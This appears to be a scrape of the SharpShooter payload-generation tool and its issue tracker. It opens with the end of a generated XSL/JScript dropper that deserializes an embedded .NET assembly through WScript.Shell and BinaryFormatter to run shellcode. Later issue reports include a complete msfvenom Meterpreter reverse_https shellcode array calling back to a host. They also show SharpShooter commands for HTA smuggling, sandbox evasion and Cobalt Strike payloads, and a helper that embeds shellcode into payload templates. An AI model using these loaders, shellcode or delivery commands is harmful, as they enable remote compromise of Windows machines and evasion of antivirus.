"CQAEGBgZERARFAkABhgYCRgYCRgHAAMCGAkRGAUgAgEIDgUgAgEcGAcgAhJdEmEcBSABCBJdCAEA"+
"CAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABkBABRTaGFycFNo"+
"b290ZXJBc3NlbWJseQAAIgEAHVNoYXJwU2hvb3RlciBQYXlsb2FkIERlbGl2ZXJ5AAAFAQAAAAAX"+
"AQASTURTZWMgQWN0aXZlQnJlYWNoAAAnAQAiQ29weXJpZ2h0IMKpIE1EU2VjIENvbnN1bHRpbmcg"+
"MjAxNwAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFmMzM3YWJlNTc3NwAADAEABzEuMC4w"+
"LjAAAAUBAAEAAAAAAAALZIRaAAAAAAIAAAAcAQAAHD4AABwgAABSU0RTCkrXhhukXku87fvh281l"+
"6QEAAABaOlxkbWNcQ29kZVxTaGFycFNob290ZXJcU2hhcnBTaG9vdGVyXENTaGFycFNob290ZXJT"+
"dGFnZWxlc3Ncb2JqXFJlbGVhc2VcU2hhcnBTaG9vdGVyQXNzZW1ibHkucGRiAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGA/AAAAAAAAAAAAAHo/AAAAIAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAABsPwAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxs"+
"AAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACA"+
"AAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAAPgDAAAAAAAAAAAAAPgDNAAAAFYAUwBfAFYARQBS"+
"AFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQA"+
"AAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABU"+
"AHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsARYAwAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkA"+
"bgBmAG8AAAA0AwAAAQAwADAAMAAwADAANABiADAAAABUAB4AAQBDAG8AbQBtAGUAbgB0AHMAAABT"+
"AGgAYQByAHAAUwBoAG8AbwB0AGUAcgAgAFAAYQB5AGwAbwBhAGQAIABEAGUAbABpAHYAZQByAHkA"+
"AABGABMAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAE0ARABTAGUAYwAgAEEAYwB0AGkAdgBl"+
"AEIAcgBlAGEAYwBoAAAAAABSABUAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAA"+
"UwBoAGEAcgBwAFMAaABvAG8AdABlAHIAQQBzAHMAZQBtAGIAbAB5AAAAAAAwAAgAAQBGAGkAbABl"+
"AFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAABSABkAAQBJAG4AdABlAHIAbgBhAGwA"+
"TgBhAG0AZQAAAFMAaABhAHIAcABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBiAGwAeQAuAGQAbABs"+
"AAAAAABoACIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgA"+
"dAAgAKkAIABNAEQAUwBlAGMAIABDAG8AbgBzAHUAbAB0AGkAbgBnACAAMgAwADEANwAAACoAAQAB"+
"AEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAAWgAZAAEATwByAGkAZwBpAG4A"+
"YQBsAEYAaQBsAGUAbgBhAG0AZQAAAFMAaABhAHIAcABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBi"+
"AGwAeQAuAGQAbABsAAAAAABKABUAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAFMAaABhAHIA"+
"cABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBiAGwAeQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABW"+
"AGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYA"+
"ZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAADAAAAwAAACMPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3Nl"+
"bWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
var entry_class = 'SharpShooter';

try {
	setversion();
	var shell = new ActiveXObject('WScript.Shell');
	shell.popup("test");
	var stm = base64ToStream(serialized_obj);
	shell.popup("test");
	var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
	var al = new ActiveXObject('System.Collections.ArrayList');
	shell.popup("test");
	var n = fmt.SurrogateSelector;
	var d = fmt.Deserialize_2(stm);
	al.Add(n);
	var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
	


	var sc = "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";
	o.Go(sc);

} catch (e) {
    debug(e.message);
}
]]>
   return nodelist.nextNode().xml;
 
   }
</msxsl:script>
<xsl:template match="/">
   <xsl:value-of select="sharp:shooter(.)"/>
</xsl:template>
</xsl:stylesheet>

.net 4 payload generation issues

Payload generation for .net 4 results in a prompt on a default Windows 10 installation to install .net 3.5.

This is via command line and interactive methods.

I believe the confusion is in the code where 1=.net 2 and 2=.net 4 and a decision is made where 2 (meaning .net 4) takes .net 2 instead.

Result is .net 2 payloads are always generated.

Easily missed if testing from a Windows 10 system that has had older .net installed.

Not able to get a Meterpreter session back to Kali VM from Win10 client (Defender OFF)

Hello,

Not sure if my msfvenom statement is correct? Never received any errors. Also, not seeing any errors after running the "python SharpShooter.py..........." command. So, when my Win10 client downloads the HTA payload and opens it, there's no callback to Meterpreter. Am I missing something here?
Thanks, Chrisandjer949

root@kali:~/SharpShooter/output# msfvenom --platform windows -p windows/x64/meterpreter/reverse_https LHOST=192.168.8.10 LPORT=4444 EnableStageEncoding=True StageEncoder=x64/shikata_ga_nai -f csharp
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 694 bytes
Final size of csharp file: 3548 bytes
byte[] buf = new byte[694] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,
0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,
0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,
0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,
0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,
0x6e,0x65,0x74,0x00,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,
0x07,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,
0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x00,0x00,0x00,0x00,0xff,0xd5,
0xe8,0x0d,0x00,0x00,0x00,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x38,0x2e,
0x31,0x30,0x00,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0x5c,0x11,0x00,0x00,0x4d,
0x31,0xc9,0x53,0x53,0x6a,0x03,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x00,0x00,
0x00,0x00,0xff,0xd5,0xe8,0x8e,0x00,0x00,0x00,0x2f,0x46,0x4f,0x58,0x6d,0x70,
0x50,0x32,0x74,0x66,0x53,0x70,0x71,0x48,0x32,0x73,0x64,0x4d,0x66,0x66,0x50,
0x35,0x67,0x43,0x42,0x76,0x48,0x4e,0x73,0x72,0x79,0x4f,0x43,0x37,0x59,0x34,
0x52,0x37,0x67,0x62,0x42,0x46,0x4b,0x36,0x79,0x61,0x34,0x4f,0x72,0x46,0x43,
0x65,0x42,0x62,0x6b,0x6a,0x68,0x74,0x73,0x79,0x34,0x63,0x76,0x39,0x4e,0x58,
0x70,0x64,0x38,0x4b,0x69,0x49,0x43,0x4e,0x36,0x48,0x42,0x76,0x32,0x38,0x66,
0x4f,0x49,0x42,0x74,0x75,0x42,0x48,0x35,0x48,0x53,0x57,0x46,0x30,0x4c,0x48,
0x52,0x4b,0x5a,0x75,0x75,0x4e,0x33,0x71,0x6d,0x39,0x75,0x38,0x73,0x4d,0x36,
0x50,0x56,0x52,0x61,0x52,0x5a,0x33,0x34,0x79,0x68,0x35,0x42,0x78,0x50,0x4d,
0x71,0x59,0x77,0x57,0x46,0x37,0x4e,0x75,0x49,0x70,0x37,0x2d,0x72,0x56,0x52,
0x00,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x00,
0x32,0xa0,0x84,0x00,0x00,0x00,0x00,0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,
0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x6a,0x1f,
0x5a,0x52,0x68,0x80,0x33,0x00,0x00,0x49,0x89,0xe0,0x6a,0x04,0x41,0x59,0x49,
0xba,0x75,0x46,0x9e,0x86,0x00,0x00,0x00,0x00,0xff,0xd5,0x4d,0x31,0xc0,0x53,
0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,
0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,
0x00,0x00,0x49,0xba,0x44,0xf0,0x35,0xe0,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,
0xff,0xcf,0x74,0x02,0xeb,0xaa,0xe8,0x55,0x00,0x00,0x00,0x53,0x59,0x6a,0x40,
0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x00,0x10,0x00,0x00,0x49,
0xba,0x58,0xa4,0x53,0xe5,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0x93,0x53,0x53,
0x48,0x89,0xe7,0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x00,0x20,0x00,
0x00,0x49,0x89,0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x00,0x00,0x00,0x00,0xff,
0xd5,0x48,0x83,0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b,0x07,0x48,0x01,0xc3,
0x85,0xc0,0x75,0xd2,0x58,0xc3,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,
0xa2,0x56,0xff,0xd5 };
root@kali:~/SharpShooter/output# cd ..

root@kali:~/SharpShooter# python SharpShooter.py --dotnetver 2 --payload hta --output hta --rawscfile ./raw.txt --web http://192.168.8.10/htadoc.hta --smuggle --template mcafee --deliver web --refs mscorlib.dll,System.Windows.Forms.dll --namespace CL2018.SharpShooter --entrypoint Main

   _____ __                    _____ __                __           
  / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____
  \__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
 ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /    
/____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/     
                     /_/                                            

 Dominic Chell, @domchell, MDSec ActiveBreach, v1.0

[*] Written delivery payload to output/hta.hta
[*] File [./output/hta.hta] successfully loaded !
[*] Encrypted input file with key [qzfcakkbfa]
[*] File [./output/hta.html] successfully created !
root@kali:~/SharpShooter#

Clean pull of the src does not appear to work with Python 3 on stock Kali

Appears to have some compatibility issues with Python 3 and 3.6. Running through the HTA payload generation causes a Python error with the Strings module.

Additionally, when running a fresh pull with Python 2.7 it will not accept a URI for the HTA payload.

I've forked the repo and have started trying to fix the bugs myself, but wanted to make MDSec aware of the issues.

Thanks for an amazing tool!

Windows Defender flagging out the dropped DLL

Hi, I tested out this framework recently but it didn't work that well for me.

In my scenario, I made use of the web delivery portion to deliver my JavaScript payload. When the JavaScript file was executed, it connected back to my attacking web server to get the shellcode (an HTTP Meterpreter payload). However, that was where the problem arose. From the Windows Defender log, I could see the DLL (Meterpreter stager) being dropped into the AppData\Local\Temp folder, causing Windows Defender to flag it as malicious. I'm not sure what's causing this, as based on what I read in the readme, the stager should actually be loaded into memory?

[!] Missing --dotnetver argument

Hey!
I've already installed dotnet on my Kali Linux, but I still can't start SharpShooter.
When I run python SharpShooter.py it shows this error.

[screenshot: 2018-07-24 18:19:46]

Encoding issue with Python3

Using Python 3 causes a UTF-8 encoding error when generating the payload, while Python 2 works fine.
Example:

root@kali:~/tools/SharpShooter# python3 ./SharpShooter.py --stageless --payload hta --rawscfile ./msf_shellcode.bin --dotnetver 4 --output poc

       _____ __                    _____ __                __           
      / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____
      \__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
     ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /    
    /____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/     
                         /_/                                            

     Dominic Chell, @domchell, MDSec ActiveBreach, v2.0
    
'utf-8' codec can't decode byte 0xda in position 0: invalid continuation byte

[!] Incorrect choice
root@kali:~/tools/SharpShooter# 
root@kali:~/tools/SharpShooter# python2 ./SharpShooter.py --stageless --payload hta --rawscfile ./msf_shellcode.bin --dotnetver 4 --output poc 

       _____ __                    _____ __                __           
      / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____
      \__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
     ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /    
    /____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/     
                         /_/                                            

     Dominic Chell, @domchell, MDSec ActiveBreach, v2.0
    
[*] Written delivery payload to output/poc.hta
root@kali:~/tools/SharpShooter# 

An app on your PC needs the following Windows feature

Did I miss something?

Create a CobaltStrike (x32) payload as shown in the Vimeo video:

python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output vbstest --rawscfile /root/payload32.bin --sandbox 3,4,5

       _____ __                    _____ __                __
      / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____
      \__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
     ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /
    /____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/
                         /_/

     Dominic Chell, @domchell, MDSec ActiveBreach, v0.2

[*] Avoiding sandbox artifacts
[*] Avoiding bad MACs
[*] Avoiding debugging
[*] Written delivery payload to output/vbstest.vbs

Execute the VBS script Windows 7 (x64): Nothing
Execute the VBS script Windows 10 (x64): An app on your PC needs the following Windows feature

[screenshot of the Windows feature prompt]

initial_value must be unicode or None, not str

Anyone facing this issue?

Command (e.g)
python2.7 SharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile shell.txt --output test

Traceback (most recent call last):
  File "SharpShooter.py", line 599, in <module>
    ss.run(args)
  File "SharpShooter.py", line 527, in run
    payload_minified = jsmin(payload)
  File "/usr/local/lib/python2.7/dist-packages/jsmin/__init__.py", line 40, in jsmin
    ins = klass(js)
TypeError: initial_value must be unicode or None, not str

Inconsistent use of tabs and spaces in modules/excel4.py

Problem: modules/excel4.py mixes spaces and tabs.
Version: latest master
Python version 3.9.0
OS: ParrotOS

Running python3 SharpShooter.py results in:

Traceback (most recent call last):
  File "/mnt/hgfs/debian/SharpShooter/SharpShooter.py", line 21, in <module>
    from modules import *
  File "/mnt/hgfs/debian/SharpShooter/modules/excel4.py", line 39
    if i == 0:
TabError: inconsistent use of tabs and spaces in indentation

Format of raw shellcode from `msfvenom`

I'm trying to generate a shellcode for a stageless sharpshooter payload, and I can't seem to format the shellcode in a way that it likes.

If I use msfvenom -p windows/x64/meterpreter/reverse_winhttp LHOST=<host> LPORT=80 Prependmigrate=true -f raw -o meter.out
then I get an error during the interactive payload creation like

[*] Provide path to raw shellcode, e.g. ./sc.raw
./meter.out
'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte  

Okay, so I used the -f python and -f hex and the like, and it complains thus:

[*] Provide path to raw shellcode, e.g. ./sc.raw
./meter_hex.out
a bytes-like object is required, not 'str'  

So I can't seem to satisfy its requirement. What weird thing am I doing wrong here? Or is this a python2/3 deal?

python -V  
Python 3.6.4
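The "'utf-8' codec can't decode byte 0xfc" error here and the "0xda" variant in the Python 3 encoding report earlier in this thread have the same root cause: raw shellcode is binary, and opening it in text mode makes Python try to decode it as UTF-8. Feeding -f hex output instead gives the opposite failure ("a bytes-like object is required, not 'str'") because the tool then receives text where it expects bytes. On Python 2 the mirror image is the jsmin "initial_value must be unicode or None, not str" traceback, where the assembled template has to be a unicode object before minifying. The following is an added example, not SharpShooter's own code, showing the read-as-bytes, unhexlify-if-needed, base64-once discipline that avoids all three; SAMPLE_SHELLCODE, the file names and the %SHELLCODE% placeholder are constructed for the example.

```python
import base64
import binascii
import re
import tempfile
from pathlib import Path

# Constructed sample: the first bytes of a typical msfvenom x64 stub (0xfc 0x48 0x83 0xe4 0xf0)
# padded with a few more bytes. Not a working payload; it only has to be non-UTF-8.
SAMPLE_SHELLCODE = bytes([0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51])


def text_mode_read_fails(path):
    """Reproduce the reported error: open() in text mode tries to UTF-8 decode the shellcode."""
    try:
        with open(path, "r", encoding="utf-8") as f:
            f.read()
    except UnicodeDecodeError as err:
        return str(err)   # "'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte"
    return None


def read_shellcode(path):
    """Return the shellcode as bytes, accepting either msfvenom -f raw or -f hex output."""
    data = Path(path).read_bytes()          # binary mode: no decoding happens
    stripped = data.strip()
    # Heuristic: a file that is nothing but an even number of hex digits was produced with -f hex.
    # Raw shellcode consisting only of ASCII hex characters would be misread; that is
    # astronomically unlikely for real shellcode but worth knowing about.
    if stripped and len(stripped) % 2 == 0 and re.fullmatch(rb"[0-9a-fA-F]+", stripped):
        return binascii.unhexlify(stripped)
    return data


def embed_in_template(shellcode, template):
    """Base64-encode the bytes and substitute them into a str template, returning str."""
    if not isinstance(shellcode, (bytes, bytearray)):
        raise TypeError("shellcode must be bytes, got " + type(shellcode).__name__)
    b64 = base64.b64encode(shellcode).decode("ascii")   # the single bytes -> str crossing
    return template.replace("%SHELLCODE%", b64)


def demo():
    """Write the constructed sample in both formats to a temp dir and exercise the helpers."""
    with tempfile.TemporaryDirectory() as d:
        raw_path = Path(d, "meter.out")
        raw_path.write_bytes(SAMPLE_SHELLCODE)
        hex_path = Path(d, "meter_hex.out")
        hex_path.write_text(SAMPLE_SHELLCODE.hex())
        return {
            "text_mode_error": text_mode_read_fails(raw_path),
            "raw": read_shellcode(raw_path),
            "hex": read_shellcode(hex_path),
            "hta": embed_in_template(read_shellcode(raw_path), 'var sc = "%SHELLCODE%";'),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The point of the structure is that bytes and str meet in exactly one place (the base64 step), so a wrong input format is caught with a clear TypeError rather than a codec error deep inside a template engine or minifier.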

Missing license information

Hello,

I didn't find any mention of the license. Could you indicate under which license SharpShooter is published, either in the Readme or in a specific LICENSE file?

Thanks

.HTA file execution doesn't call back

Hi,

Currently I'm generating a RAW payload in Cobalt Strike for a windows/beacon/reverse_https listener. Output is a standard payload.bin file, which is then used as input to SharpShooter as follows:

SharpShooter.py --stageless --dotnetver 4 --payload hta --output test --rawscfile payload.bin

I've also tried the following variation:

SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile payload.bin --smuggle --template mcafee

However every time I try to run the HTA file on Windows, the payload fails to call back. Windows Defender is disabled for all of this testing, and no other AV is present. Network monitoring with Wireshark confirms too that the payload is not calling out. I have tried modifying the harness.hta template to just take the payload.bin as input, without any base64 encoding or the rc4 encipherment to check if it works, however the payload still refuses to call out or even make a network connection attempt.

Am I being obtuse or can someone confirm these findings? I have tried with both Internet Explorer and of course Microsoft (R) HTML Application Host.

Request: Update for Python3

Would be cool if we could use Python3 instead of 2 for this. It doesn't even run for me with Python2 now.
